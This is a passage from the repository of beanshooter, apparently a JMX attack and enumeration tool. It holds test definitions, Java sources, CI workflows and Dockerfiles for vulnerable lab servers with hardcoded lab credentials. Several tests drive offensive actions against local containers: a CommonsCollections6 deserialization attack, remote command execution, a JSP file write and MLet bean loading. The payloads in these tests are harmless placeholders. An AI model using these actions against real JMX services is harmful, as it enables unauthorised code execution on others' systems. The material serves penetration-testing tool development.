MBean with ObjectName Users:type=UserDatabase,database=UserDatabase from the MBeanServer' 29 | 30 | 31 | - title: Invoke list action 32 | description: |- 33 | Use the list action on a server where the bean is not available 34 | 35 | command: 36 | - beanshooter 37 | - tomcat 38 | - list 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | 42 | validators: 43 | - error: True 44 | - contains: 45 | values: 46 | - ' The specified MBean Users:type=UserDatabase,database=UserDatabase does probably not exist on the endpoint' 47 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/set/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot set action (Error) 3 | description: |- 4 | Perform tests for the error handling of beanshooters hotspot set action. 5 | 6 | id: '13-04-02' 7 | groups: 8 | - error 9 | id_pattern: '13-04-02-{:02}' 10 | 11 | tests: 12 | - title: Non existent 13 | description: |- 14 | Attempt to set information on non existent option 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - set 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - test 23 | - test 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'A VMOption with name test does not exist on the remote server' 30 | 31 | - title: Invalid value 32 | description: |- 33 | Attempt to set an option to an invalid value 34 | 35 | command: 36 | - beanshooter 37 | - hotspot 38 | - set 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - HeapDumpBeforeFullGC 42 | - test 43 | 44 | validators: 45 | - error: False 46 | - contains: 47 | values: 48 | - 'The specified value test is invalid.' 49 | - 'Invalid value: VM Option "HeapDumpBeforeFullGC" expects "true" or "false"' 50 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/GlassFishException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | import de.qtc.beanshooter.io.Logger; 4 | 5 | /** 6 | * The GlassFishException is thrown when GlassFish specific error messages 7 | * are observed during a JMX login attempt. 8 | * 9 | * @author Tobias Neitzel (@qtc_de) 10 | */ 11 | public class GlassFishException extends AuthenticationException { 12 | 13 | private static final long serialVersionUID = 1L; 14 | 15 | public GlassFishException(Exception e) 16 | { 17 | super(e, false); 18 | } 19 | 20 | public GlassFishException(Exception e, boolean showDetails) 21 | { 22 | super(e, showDetails); 23 | } 24 | 25 | public void printStackTrace() 26 | { 27 | if (origException.getMessage().contains("AdminLoginModule$PrincipalCallback")) 28 | { 29 | Logger.lineBreak(); 30 | Logger.printlnMixedBlue("The following stacktrace might be misleading. See", "https://github.com/eclipse-ee4j/glassfish/issues/24223"); 31 | Logger.printlnMixedYellow("Summarized: The error is probably caused by", "missing or invalid", "credentials."); 32 | Logger.lineBreak(); 33 | } 34 | 35 | origException.printStackTrace(); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/logfile/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic logfile action (RMI) 3 | description: |- 4 | Perform tests on beanshooters diagnostic logfile action for RMI based connections 5 | 6 | id: '06-03-01' 7 | groups: 8 | - rmi 9 | id_pattern: '06-03-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Set logfile location 14 | description: |- 15 | Attempt to set a new log location 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - logfile 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - ${volume-d}/logfile.log 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'Logfile path was successfully set to ' 30 | - file_exists: 31 | cleanup: True 32 | files: 33 | - ${volume}/logfile.log 34 | 35 | - title: Set logfile location 2 36 | description: |- 37 | Attempt to set a new log location 38 | 39 | command: 40 | - beanshooter 41 | - diagnostic 42 | - logfile 43 | - ${TARGET} 44 | - ${OPTIONS} 45 | - /tmp/test 46 | 47 | validators: 48 | - error: False 49 | - contains: 50 | values: 51 | - 'Logfile path was successfully set to ' 52 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/set/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot set action (Error) 3 | description: |- 4 | Perform tests for the error handling of beanshooters hotspot set action. 5 | 6 | id: '08-04-02' 7 | groups: 8 | - rmi 9 | id_pattern: '08-04-02-{:02}' 10 | 11 | tests: 12 | - title: Non existent 13 | description: |- 14 | Attempt to set information on non existent option 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - set 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - test 23 | - test 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'A VMOption with name test does not exist on the remote server.' 30 | 31 | - title: Invalid value 32 | description: |- 33 | Attempt to set an option to an invalid value 34 | 35 | command: 36 | - beanshooter 37 | - hotspot 38 | - set 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - HeapDumpBeforeFullGC 42 | - test 43 | 44 | validators: 45 | - error: False 46 | - contains: 47 | values: 48 | - 'The specified value test is invalid' 49 | - 'Invalid value: VM Option "HeapDumpBeforeFullGC" expects "true" or "false"' 50 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/write/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat write action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters tomcat write action 5 | 6 | id: '10-07-02' 7 | groups: 8 | - error 9 | id_pattern: '10-07-02-{:02}' 10 | 11 | tests: 12 | - title: Write a non existing file 13 | description: |- 14 | Attempt to write a non existing file. 15 | 16 | command: 17 | - beanshooter 18 | - tomcat 19 | - write 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - /tmp/nonono.dat 23 | - /tmp/dada 24 | 25 | validators: 26 | - error: True 27 | - regex: 28 | match: 29 | - 'The specified file .+ seems not to exist' 30 | 31 | 32 | - title: Write from a read protected area 33 | description: |- 34 | Attempt to write a file we do not have permissions to. 35 | 36 | command: 37 | - beanshooter 38 | - tomcat 39 | - write 40 | - ${TARGET} 41 | - ${OPTIONS} 42 | - /root/nonono.dat 43 | - /tmp/dada 44 | 45 | validators: 46 | - error: True 47 | - regex: 48 | match: 49 | - 'Caught AccessDeniedException while opening input file' 50 | - 'Missing the required permissions to read file: .+' 51 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/write/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat write action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters tomcat write action 5 | 6 | id: '05-07-02' 7 | groups: 8 | - error 9 | id_pattern: '05-07-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Write a non existing file 14 | description: |- 15 | Attempt to write a non existing file. 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - write 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /tmp/nonono.dat 24 | - /tmp/dada 25 | 26 | validators: 27 | - error: True 28 | - regex: 29 | match: 30 | - 'The specified file .+ seems not to exist' 31 | 32 | 33 | - title: Write from a read protected area 34 | description: |- 35 | Attempt to write a file we do not have permissions to. 36 | 37 | command: 38 | - beanshooter 39 | - tomcat 40 | - write 41 | - ${TARGET} 42 | - ${OPTIONS} 43 | - /root/nonono.dat 44 | - /tmp/dada 45 | 46 | validators: 47 | - error: True 48 | - regex: 49 | match: 50 | - 'Caught AccessDeniedException while opening input file' 51 | - 'Missing the required permissions to read file: .+' 52 | -------------------------------------------------------------------------------- /.github/workflows/master.yml: -------------------------------------------------------------------------------- 1 | name: master maven CI 2 | 3 | on: 4 | push: 5 | 6 | branches: 7 | - master 8 | paths: 9 | - 'beanshooter/pom.xml' 10 | - 'beanshooter/src/**' 11 | - 'tonka-bean/pom.xml' 12 | - 'tonka-bean/src/**' 13 | - 'pom.xml' 14 | 15 | pull_request: 16 | 17 | branches: 18 | - master 19 | paths: 20 | - 'beanshooter/pom.xml' 21 | - 'beanshooter/src/**' 22 | - 'tonka-bean/pom.xml' 23 | - 'tonka-bean/src/**' 24 | - 'pom.xml' 25 | 26 | jobs: 27 | build: 28 | 29 | runs-on: ubuntu-latest 30 | 31 | steps: 32 | 33 | - uses: actions/checkout@v2 34 | 35 | - name: Set up JDK 1.8 36 | uses: actions/setup-java@v1 37 | with: 38 | java-version: 1.8 39 | 40 | - name: Cache local Maven repository 41 | uses: actions/cache@v2 42 | with: 43 | path: ~/.m2/repository 44 | key: ${{ runner.os }}-maven-${{ hashFiles('**/pom.xml') }} 45 | restore-keys: | 46 | ${{ runner.os }}-maven- 47 | 48 | - name: Build with Maven 49 | run: mvn -B package --file pom.xml 50 | 51 | - name: Archive generated JAR file 52 | uses: actions/upload-artifact@v2 53 | with: 54 | name: beanshooter-master-artifact 55 | path: target/beanshooter-* 56 | -------------------------------------------------------------------------------- /.github/workflows/develop.yml: -------------------------------------------------------------------------------- 1 | name: develop maven CI 2 | 3 | on: 4 | push: 5 | 6 | branches: 7 | - develop 8 | paths: 9 | - 'beanshooter/pom.xml' 10 | - 'beanshooter/src/**' 11 | - 'tonka-bean/pom.xml' 12 | - 'tonka-bean/src/**' 13 | - 'pom.xml' 14 | 15 | pull_request: 16 | 17 | branches: 18 | - develop 19 | paths: 20 | - 'beanshooter/pom.xml' 21 | - 'beanshooter/src/**' 22 | - 'tonka-bean/pom.xml' 23 | - 'tonka-bean/src/**' 24 | - 'pom.xml' 25 | 26 | jobs: 27 | build: 28 | 29 | runs-on: ubuntu-latest 30 | 31 | steps: 32 | 33 | - uses: actions/checkout@v2 34 | 35 | - name: Set up JDK 1.8 36 | uses: actions/setup-java@v1 37 | with: 38 | java-version: 1.8 39 | 40 | - name: Cache local Maven repository 41 | uses: actions/cache@v2 42 | with: 43 | path: ~/.m2/repository 44 | key: ${{ runner.os }}-maven-${{ hashFiles('**/pom.xml') }} 45 | restore-keys: | 46 | ${{ runner.os }}-maven- 47 | 48 | - name: Build with Maven 49 | run: mvn -B package --file pom.xml 50 | 51 | - name: Archive generated JAR file 52 | uses: actions/upload-artifact@v2 53 | with: 54 | name: beanshooter-develop-artifact 55 | path: target/beanshooter-* 56 | -------------------------------------------------------------------------------- /tests/jolokia/mlet/load/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet load action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters mlet load action 5 | 6 | id: '12-02-02' 7 | groups: 8 | - error 9 | id_pattern: '12-02-02-{:02}' 10 | 11 | tests: 12 | - title: No stager 13 | description: |- 14 | Attempt to load a custom bean without spcifying the required information 15 | 16 | command: 17 | - beanshooter 18 | - mlet 19 | - load 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - custom 23 | - 'http://127.0.0.1' 24 | - --no-stager 25 | 26 | validators: 27 | - error: True 28 | - contains: 29 | values: 30 | - 'Error: The specified aciton requires the --class-name, --object-name, --jar-file options' 31 | 32 | 33 | - title: Closed stager port 34 | description: |- 35 | Attempt to load the tonka bean without opening a stager port 36 | 37 | command: 38 | - beanshooter 39 | - mlet 40 | - load 41 | - ${TARGET} 42 | - ${OPTIONS} 43 | - tonka 44 | - 'http://127.0.0.1' 45 | - --no-stager 46 | 47 | validators: 48 | - error: True 49 | - contains: 50 | values: 51 | - 'Target http://127.0.0.1 refused the connection' 52 | -------------------------------------------------------------------------------- /tests/jolokia/basic/serial/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: serial action 3 | description: |- 4 | Perform tests on beanshooters serial action. Since serialization attacks 5 | are not supported via Jolokia, these tests are rather short. 6 | 7 | id: '15-08' 8 | groups: 9 | - serial 10 | - target 11 | id_pattern: '15-08-01-{:02}' 12 | 13 | tests: 14 | - title: Plain Deserialization 15 | description: |- 16 | Attempt a deserialization attack on a Jolokia endpoint 17 | 18 | command: 19 | - beanshooter 20 | - serial 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - CommonsCollections6 24 | - 'touch /tmp/test' 25 | 26 | validators: 27 | - error: True 28 | - contains: 29 | values: 30 | - The serial action is not supported for Jolokia based connections 31 | 32 | - title: Preauth deserialization 33 | description: |- 34 | Attempt a pre-auth deserialization attack on a Jolokia endpoint 35 | 36 | command: 37 | - beanshooter 38 | - serial 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - CommonsCollections6 42 | - 'touch /tmp/test' 43 | 44 | validators: 45 | - error: True 46 | - contains: 47 | values: 48 | - The serial action is not supported for Jolokia based connections 49 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/tomcat/MemoryUserDatabaseMBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean.tomcat; 2 | 3 | import javax.management.MBeanException; 4 | 5 | import de.qtc.beanshooter.mbean.INative; 6 | 7 | /** 8 | * General user operations on Apache tomcat are exposed through the MemoryUserDatabaseMBean. 9 | * This interface contains some of the exposed methods. They are currently not implemented, 10 | * but may be used in future. 11 | * 12 | * @author Tobias Neitzel (@qtc_de) 13 | */ 14 | public interface MemoryUserDatabaseMBean extends INative 15 | { 16 | public String createGroup(String groupname, String description) throws MBeanException; 17 | public String createRole(String rolename, String description) throws MBeanException; 18 | public String createUser(String username, String password, String fullName) throws MBeanException; 19 | public String findGroup(String groupname) throws MBeanException; 20 | public String findRole(String rolename) throws MBeanException; 21 | public String findUser(String username) throws MBeanException; 22 | public void removeGroup(String groupname) throws MBeanException; 23 | public void removeRole(String rolename) throws MBeanException; 24 | public void removeUser(String username) throws MBeanException; 25 | public void save() throws MBeanException; 26 | } 27 | -------------------------------------------------------------------------------- /tests/tomcat-server/mlet/load/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet load action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters mlet load action 5 | 6 | id: '07-02-01' 7 | groups: 8 | - error 9 | id_pattern: '07-02-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: No stager 14 | description: |- 15 | Attempt to load a custom bean without spcifying the required information 16 | 17 | command: 18 | - beanshooter 19 | - mlet 20 | - load 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - custom 24 | - 'http://127.0.0.1' 25 | - --no-stager 26 | 27 | validators: 28 | - error: True 29 | - contains: 30 | values: 31 | - 'Error: The specified aciton requires the --class-name, --object-name, --jar-file options' 32 | 33 | 34 | - title: Closed stager port 35 | description: |- 36 | Attempt to load the tonka bean without opening a stager port 37 | 38 | command: 39 | - beanshooter 40 | - mlet 41 | - load 42 | - ${TARGET} 43 | - ${OPTIONS} 44 | - tonka 45 | - 'http://127.0.0.1' 46 | - --no-stager 47 | 48 | validators: 49 | - error: True 50 | - contains: 51 | values: 52 | - 'Target http://127.0.0.1 refused the connection' 53 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/upload/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka upload action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters tonka upload action for JMXMP based connections 5 | 6 | id: '03-07-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '03-07-02-{:02}' 10 | 11 | 12 | plugins: 13 | - tempfile: 14 | path: tempfile 15 | content: |- 16 | Random content 17 | 18 | 19 | tests: 20 | - title: Upload tempfile 21 | description: |- 22 | Upload a tempfile to the MBeanServer 23 | 24 | command: 25 | - beanshooter 26 | - tonka 27 | - upload 28 | - ${JMXMP_NTLM} 29 | - ${OPTIONS} 30 | - --username 31 | - controlRole 32 | - --password 33 | - control 34 | - tempfile 35 | - /rce/jmxmp-upload 36 | 37 | validators: 38 | - error: False 39 | - contains: 40 | values: 41 | - 'Uploading local file' 42 | - 'to path ${volume-d}jmxmp-upload on the MBeanSerer' 43 | - 'bytes were written to ${volume-d}jmxmp-upload' 44 | - file_contains: 45 | - file: ${volume}jmxmp-upload 46 | contains: 47 | - 'Random content' 48 | - file_exists: 49 | cleanup: True 50 | files: 51 | - ${volume}jmxmp-upload 52 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/mlet/load/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet load action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters mlet load action 5 | 6 | id: '04-02-01' 7 | groups: 8 | - error 9 | id_pattern: '04-02-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: No stager 14 | description: |- 15 | Attempt to load a custom bean without spcifying the required information 16 | 17 | command: 18 | - beanshooter 19 | - mlet 20 | - load 21 | - ${TARGET_UNAUTH} 22 | - ${OPTIONS} 23 | - custom 24 | - 'http://127.0.0.1' 25 | - --no-stager 26 | 27 | validators: 28 | - error: True 29 | - contains: 30 | values: 31 | - 'Error: The specified aciton requires the --class-name, --object-name, --jar-file options' 32 | 33 | 34 | - title: Closed stager port 35 | description: |- 36 | Attempt to load the tonka bean without opening a stager port 37 | 38 | command: 39 | - beanshooter 40 | - mlet 41 | - load 42 | - ${TARGET_UNAUTH} 43 | - ${OPTIONS} 44 | - tonka 45 | - 'http://127.0.0.1' 46 | - --no-stager 47 | 48 | validators: 49 | - error: True 50 | - contains: 51 | values: 52 | - 'Target http://127.0.0.1 refused the connection' 53 | -------------------------------------------------------------------------------- /docker/jolokia/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tomcat:9-jdk8 2 | 3 | COPY ./resources/conf/tomcat-users.xml \ 4 | ./resources/conf/jmxremote.access \ 5 | ./resources/conf/jmxremote.password \ 6 | ./resources/scripts/start.sh \ 7 | /usr/local/tomcat/conf/ 8 | 9 | RUN set -ex \ 10 | && chmod 400 /usr/local/tomcat/conf/jmxremote.access \ 11 | && chmod 400 /usr/local/tomcat/conf/jmxremote.password \ 12 | && chmod +x /usr/local/tomcat/conf/start.sh \ 13 | && wget -O /usr/local/tomcat/webapps/jolokia.war \ 14 | 'https://search.maven.org/remotecontent?filepath=org/jolokia/jolokia-war/1.7.1/jolokia-war-1.7.1.war' 15 | 16 | ENV _JAVA_OPTIONS -Djava.rmi.server.hostname=localhost \ 17 | -Dcom.sun.management.jmxremote \ 18 | -Dcom.sun.management.jmxremote.ssl=false \ 19 | -Dcom.sun.management.jmxremote.local.only=true \ 20 | -Dcom.sun.management.jmxremote.authenticate=false \ 21 | -Dcom.sun.management.jmxremote.port=1090 \ 22 | -Dcom.sun.management.jmxremote.rmi.port=1090 \ 23 | -Dcom.sun.management.jmxremote.password.file=/usr/local/tomcat/conf/jmxremote.password \ 24 | -Dcom.sun.management.jmxremote.access.file=/usr/local/tomcat/conf/jmxremote.access \ 25 | -Dorg.jolokia.jsr160ProxyEnabled=true 26 | 27 | EXPOSE 1090/tcp 8080/tcp 28 | 29 | CMD ["/usr/local/tomcat/conf/start.sh"] 30 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/execarray/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka execarray action (RMI) 3 | description: |- 4 | Perform tests on beanshooters tonka execarray action for RMI based connections 5 | 6 | id: '03-05-01' 7 | groups: 8 | - rmi 9 | id_pattern: '03-05-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Exec id 14 | description: |- 15 | Execute the id command on the MBeanServer 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - exec 21 | - ${TARGET_UNAUTH} 22 | - ${OPTIONS} 23 | - id 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'The call was successful' 30 | - 'uid=0(root) gid=0(root) groups=0(root)' 31 | 32 | 33 | - title: Exec with shell 34 | description: |- 35 | Execute some shell commands with shell special characters 36 | 37 | command: 38 | - beanshooter 39 | - tonka 40 | - execarray 41 | - ${TARGET_UNAUTH} 42 | - ${OPTIONS} 43 | - --env 44 | - BEANSHOOTER=rocks 45 | - -- 46 | - sh 47 | - -c 48 | - 'echo $HOME && echo $BEANSHOOTER' 49 | 50 | validators: 51 | - error: False 52 | - contains: 53 | values: 54 | - 'The call was successful' 55 | - '/root' 56 | - 'rocks' 57 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/exec/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka exec action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters tonka exec action 5 | 6 | id: '03-04-03' 7 | groups: 8 | - jmxmp 9 | id_pattern: '03-04-03-{:02}' 10 | 11 | tests: 12 | - title: Non existing command 13 | description: |- 14 | Attempt to execute a non existing command 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - exec 20 | - ${JMXMP_NTLM} 21 | - ${OPTIONS} 22 | - nonono 23 | - --username 24 | - controlRole 25 | - --password 26 | - control 27 | 28 | validators: 29 | - error: False 30 | - contains: 31 | values: 32 | - 'Unknown command: nonono' 33 | 34 | 35 | - title: Non writable output file 36 | description: |- 37 | Attempt to write output to a non writable file 38 | 39 | command: 40 | - beanshooter 41 | - tonka 42 | - exec 43 | - ${JMXMP_NTLM} 44 | - ${OPTIONS} 45 | - id 46 | - --username 47 | - controlRole 48 | - --password 49 | - control 50 | - --output-file 51 | - /root/test 52 | 53 | validators: 54 | - error: True 55 | - contains: 56 | values: 57 | - 'Missing the required permissions to write to: /root/test' 58 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/cli/Option.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.cli; 2 | 3 | import net.sourceforge.argparse4j.inf.ArgumentAction; 4 | import net.sourceforge.argparse4j.inf.Namespace; 5 | 6 | /** 7 | * beanshooters command line layout contains subparsers for each supported MBean. 8 | * MBean implementations are responsible for adding their available options within 9 | * their own package namespace using an enum that implements the Option interface. 10 | * 11 | * The enum should contain all available options in the same format as they are 12 | * stored in the de.qtc.beanshooter.operations.BeanshooterOption enum. beanshooter 13 | * uses the interface functions to obtain the option values during runtime and to 14 | * add them to the command line. 15 | * 16 | * @author Tobias Neitzel (@qtc_de) 17 | */ 18 | public interface Option 19 | { 20 | public String name(); 21 | public ArgType getArgType(); 22 | public ArgumentAction argumentAction(); 23 | public boolean getBool(); 24 | public boolean isNull(); 25 | public boolean notNull(); 26 | public OptionGroup optionGroup(); 27 | public String description(); 28 | public String metavar(); 29 | public String getName(); 30 | public T getValue(); 31 | public void setValue(Namespace args, Object def); 32 | public void setValue(Object value); 33 | public void setValue(Object value, Object def); 34 | } 35 | -------------------------------------------------------------------------------- /docker/jmx-example-server/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | 3 | services: 4 | beanshooter: 5 | image: ghcr.io/qtc-de/beanshooter/jmx-example-server:2.1 6 | build: . 7 | #environment: 8 | # - > 9 | # _JAVA_OPTIONS= 10 | # -Djava.rmi.server.hostname=iinsecure.example 11 | # -Djavax.net.ssl.keyStorePassword=password 12 | # -Djavax.net.ssl.keyStore=/opt/store.p12 13 | # -Djavax.net.ssl.keyStoreType=pkcs12 14 | # -Dcom.sun.management.jmxremote 15 | # -Dcom.sun.management.jmxremote.local.only=false 16 | # -Dcom.sun.management.jmxremote.authenticate=true 17 | # -Dcom.sun.management.jmxremote.port=1099 18 | # -Dcom.sun.management.jmxremote.rmi.port=1099 19 | # -Dcom.sun.management.jmxremote.ssl=true 20 | # -Dcom.sun.management.jmxremote.registry.ssl=true 21 | # -Dcom.sun.management.jmxremote.password.file=/opt/jmxremote.password 22 | # -Dcom.sun.management.jmxremote.access.file=/opt/jmxremote.access 23 | #volumes: 24 | # - ./resources/trust/store.p12:/opt/store.p12 25 | # - ./resources/scripts/start.sh:/opt/start.sh 26 | # - ./resources/conf/jmxmp.access:/opt/jmxmp.access 27 | # - ./resources/conf/jmxremote.access:/opt/jmxremote.access 28 | # - ./resources/conf/jmxremote.password:/opt/jmxremote.password 29 | -------------------------------------------------------------------------------- /tests/jolokia/basic/enum/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: enum action 3 | description: |- 4 | Perform tests on beanshooters enum action 5 | 6 | id: '15-04' 7 | groups: 8 | - enum 9 | - target 10 | id_pattern: '15-04-01-{:02}' 11 | 12 | tests: 13 | - title: Enum Action - Unauth 14 | description: |- 15 | Perform the enum operation on the Jolokia endpoint 16 | 17 | command: 18 | - beanshooter 19 | - enum 20 | - ${TARGET_NO_AUTH} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - Remote MBean server requires authentication 28 | - Non Vulnerable 29 | 30 | - title: Enum Action - Auth 31 | description: |- 32 | Perform the enum operation on the Jolokia endpoint 33 | 34 | command: 35 | - beanshooter 36 | - enum 37 | - ${TARGET} 38 | - ${OPTIONS} 39 | 40 | validators: 41 | - error: False 42 | - contains: 43 | values: 44 | - 'Login successful! The specified credentials are correct' 45 | - 'Agent Version 1.7.1 - Protocol Version: 7.2' 46 | - 'Jolokia Proxy Mode is enabled! You may connect to backend JMX services' 47 | - 'MBeans are currently registred on the MBean server' 48 | - 'Listing 3 tomcat users' 49 | - 'Username: admin' 50 | - 'Password: s3cr3T!$' 51 | 52 | testers: 53 | - ./error/tricot.yml 54 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/server/src/de/qtc/beanshooter/server/jmxmp/PlainJmxmpServer.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.server.jmxmp; 2 | 3 | import java.io.IOException; 4 | import java.lang.management.ManagementFactory; 5 | import java.util.HashMap; 6 | import java.util.Map; 7 | 8 | import javax.management.MBeanServer; 9 | import javax.management.remote.JMXConnectorServer; 10 | import javax.management.remote.JMXConnectorServerFactory; 11 | import javax.management.remote.JMXServiceURL; 12 | 13 | /** 14 | * Just a plain JMXMP listener that does not require authentication. 15 | * 16 | * @author Tobias Neitzel (@qtc_de) 17 | */ 18 | public class PlainJmxmpServer { 19 | 20 | private JMXConnectorServer server; 21 | 22 | /** 23 | * Create the server object. 24 | * 25 | * @param port port number to launch the server on 26 | * @throws IOException 27 | */ 28 | public PlainJmxmpServer(int port) throws IOException 29 | { 30 | Map env = new HashMap(); 31 | 32 | MBeanServer mbeanServer = ManagementFactory.getPlatformMBeanServer(); 33 | JMXServiceURL url = new JMXServiceURL("jmxmp", "0.0.0.0", port); 34 | 35 | server = JMXConnectorServerFactory.newJMXConnectorServer(url, env, mbeanServer); 36 | } 37 | 38 | /** 39 | * Start the server. 40 | * 41 | * @throws IOException 42 | */ 43 | public void start() throws IOException 44 | { 45 | server.start(); 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/write/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat write action 3 | description: |- 4 | Perform tests on beanshooters tomcat write action 5 | 6 | id: '10-07' 7 | groups: 8 | - write 9 | id_pattern: '10-07-01-{:02}' 10 | 11 | variables: 12 | content: 'This is some content for the tempfile' 13 | tempfile: '/tmp/tricot_tempfile' 14 | 15 | plugins: 16 | - tempfile: 17 | path: ${tempfile} 18 | content: ${content} 19 | 20 | tests: 21 | - title: write action 22 | description: |- 23 | Use the write action to write user controlled content into the docker volume. 24 | Unfortunately, it is currently not possible to check the content of the written 25 | file when not running tricot as root. This is because the tomcat service in the 26 | currently used container runs as root and writes the file as read protected from 27 | other users. 28 | 29 | command: 30 | - beanshooter 31 | - tomcat 32 | - write 33 | - ${TARGET} 34 | - ${OPTIONS} 35 | - ${tempfile} 36 | - ${volume-d}/test.jsp 37 | 38 | validators: 39 | - error: False 40 | - contains: 41 | values: 42 | - 'Writing local file ${tempfile} to server location ${volume-d}/test.jsp' 43 | - 'conf/tomcat-users.xml' 44 | - 'All done.' 45 | - file_exists: 46 | files: 47 | - ${volume}/test.jsp 48 | cleanup: True 49 | 50 | testers: 51 | - ./error/tricot.yml 52 | -------------------------------------------------------------------------------- /docker/jmx-example-server/README.md: -------------------------------------------------------------------------------- 1 | ### JMX Example Server 2 | 3 | ---- 4 | 5 | The *JMX example server* is a docker container that runs several differently configured *JMX* 6 | endpoints. It can be used to practice and test almost all actions supported by *beanshooter*. 7 | 8 | 9 | ### Service Summary 10 | 11 | ---- 12 | 13 | Here is a summarized overview of the exposed services: 14 | 15 | 16 | * ``0.0.0.0:1090`` - *RMI registry* binding a *JMX remote object* that requires authentication 17 | * ``0.0.0.0:1099`` - *SSL* protected *RMI registry* binding a *JMX remote object* that requires authentication 18 | * ``0.0.0.0:4444`` - *JMXMP* endpoint without *SASL* 19 | * ``0.0.0.0:4445`` - *JMXMP* endpoint with `TLS` *SASL* profile 20 | * ``0.0.0.0:4446`` - *JMXMP* endpoint with `TLS PLAIN` *SASL* profile 21 | * ``0.0.0.0:4447`` - *JMXMP* endpoint with `TLS DIGEST-MD5` *SASL* profile 22 | * ``0.0.0.0:4448`` - *JMXMP* endpoint with `TLS CRAM-MD5` *SASL* profile 23 | * ``0.0.0.0:4449`` - *JMXMP* endpoint with `TLS NTLM` *SASL* profile 24 | * ``0.0.0.0:9010`` - *RMI registry* binding a *JMX remote object* that does not require authentication 25 | 26 | 27 | ### Credentials 28 | 29 | ---- 30 | 31 | * All *JMXMP* endpoints that require authentication (`4446-4449`) and the 32 | *JMX* service listening on `1099` use the following credentials: 33 | * `controlRole:control` 34 | * `monitorRole:monitor` 35 | 36 | * The password protected *JMX* service on port `1090` uses the following credentials: 37 | * `admin:admin` 38 | 39 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/write/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat write action (RMI) 3 | description: |- 4 | Perform tests on beanshooters tomcat write action for RMI based connections 5 | 6 | id: '05-07-01' 7 | groups: 8 | - rmi 9 | id_pattern: '05-07-01-{:02}' 10 | 11 | 12 | variables: 13 | content: 'This is some content for the tempfile' 14 | tempfile: '/tmp/tricot_tempfile' 15 | 16 | 17 | plugins: 18 | - tempfile: 19 | path: ${tempfile} 20 | content: ${content} 21 | 22 | 23 | tests: 24 | - title: write action 25 | description: |- 26 | Use the write action to write user controlled content into 